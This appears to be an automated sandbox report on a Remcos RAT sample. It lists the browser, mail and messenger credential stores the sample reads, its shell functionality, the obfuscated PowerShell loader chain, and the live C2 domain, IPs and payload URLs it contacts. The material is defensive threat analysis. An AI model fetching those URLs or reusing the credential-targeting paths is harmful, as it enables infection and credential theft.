Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00404F51 GetLocalTime,CreateEventA,CreateThread, 0_2_00404F51
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0041B60D GetComputerNameExW,GetUserNameW, 0_2_0041B60D
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 0_2_00449190
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0041739B GetVersionExW, 4_2_0041739B
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE
Source: Yara match File source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3792, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3504, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
Contains functionality to steal Chrome passwords or cookies
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0_2_0040BA12
Contains functionality to steal Firefox passwords or cookies
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 0_2_0040BB30
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: \key3.db 0_2_0040BB30
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Tries to steal Instant Messenger accounts or passwords
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: ESMTPPassword 5_2_004033F0
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 5_2_00402DB3
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 5_2_00402DB3
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Remcos RAT
Source: Yara match File source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE
Source: Yara match File source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3792, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3504, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
Contains functionality to launch a control a shell (cmd.exe)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: cmd.exe 0_2_0040569A
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483073 Sample: 17220015066e9475efc6df52db0... Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 40 iwarsut775laudrye2.duckdns.org 2->40 42 new.quranushaiqer.org.sa 2->42 44 3 other IPs or domains 2->44 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus detection for URL or domain 2->58 62 14 other signatures 2->62 10 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe 6 16 2->10         started        signatures3 60 Uses dynamic DNS services 40->60 process4 dnsIp5 50 iwarsut775laudrye2.duckdns.org 192.253.251.227, 49710, 49711, 49712 THORDC-ASIS United States 10->50 52 geoplugin.net 178.237.33.50, 49713, 80 ATOM86-ASATOM86NL Netherlands 10->52 36 C:\Users\user\AppData\Roaming\sfvnspt.dat, data 10->36 dropped 38 C:\Users\user\AppData\...\Forfrelsens.vbs, ASCII 10->38 dropped 72 Contains functionality to bypass UAC (CMSTPLUA) 10->72 74 Detected unpacking (changes PE section rights) 10->74 76 Tries to steal Mail credentials (via file registry) 10->76 78 9 other signatures 10->78 15 wscript.exe 1 10->15         started        18 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe 1 10->18         started        20 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe 1 10->20         started        22 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe 2 10->22         started        file6 signatures7 process8 signatures9 80 Suspicious powershell command line found 15->80 82 Wscript starts Powershell (via cmd or directly) 15->82 84 Obfuscated command line found 15->84 92 3 other signatures 15->92 24 powershell.exe 15 21 15->24         started        86 Tries to steal Instant Messenger accounts or passwords 18->86 88 Tries to steal Mail credentials (via file / registry access) 18->88 90 Tries to harvest and steal browser information (history, passwords, etc) 20->90 process10 dnsIp11 46 asociatiatraditiimaria.ro 93.113.54.56, 443, 49716, 49718 GTSCEGTSCentralEuropeAntelGermanyCZ Romania 24->46 48 new.quranushaiqer.org.sa 34.166.62.190, 443, 49723 ATGS-MMD-ASUS United States 24->48 64 Suspicious powershell command line found 24->64 66 Obfuscated command line found 24->66 68 Very long command line found 24->68 70 Found suspicious powershell code related to unpacking or dynamic code loading 24->70 28 powershell.exe 24->28         started        30 conhost.exe 24->30         started        32 cmd.exe 1 24->32         started        signatures12 process13 process14 34 cmd.exe 28->34         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.166.62.190
 new.quranushaiqer.org.sa United States
2686 ATGS-MMD-ASUS false
93.113.54.56
 asociatiatraditiimaria.ro Romania
5588 GTSCEGTSCentralEuropeAntelGermanyCZ false
192.253.251.227
 iwarsut775laudrye2.duckdns.org United States
50613 THORDC-ASIS true
178.237.33.50
 geoplugin.net Netherlands
8455 ATOM86-ASATOM86NL false

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.210.172 true
asociatiatraditiimaria.ro 93.113.54.56 true
geoplugin.net 178.237.33.50 true
iwarsut775laudrye2.duckdns.org 192.253.251.227 true
new.quranushaiqer.org.sa 34.166.62.190 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm false
  • Avira URL Cloud: malware
 unknown
https://asociatiatraditiimaria.ro/os/transportment.pfm false
  • Avira URL Cloud: malware
 unknown
iwarsut775laudrye2.duckdns.org true
  • Avira URL Cloud: malware
 unknown
http://geoplugin.net/json.gp false
  • URL Reputation: safe
 unknown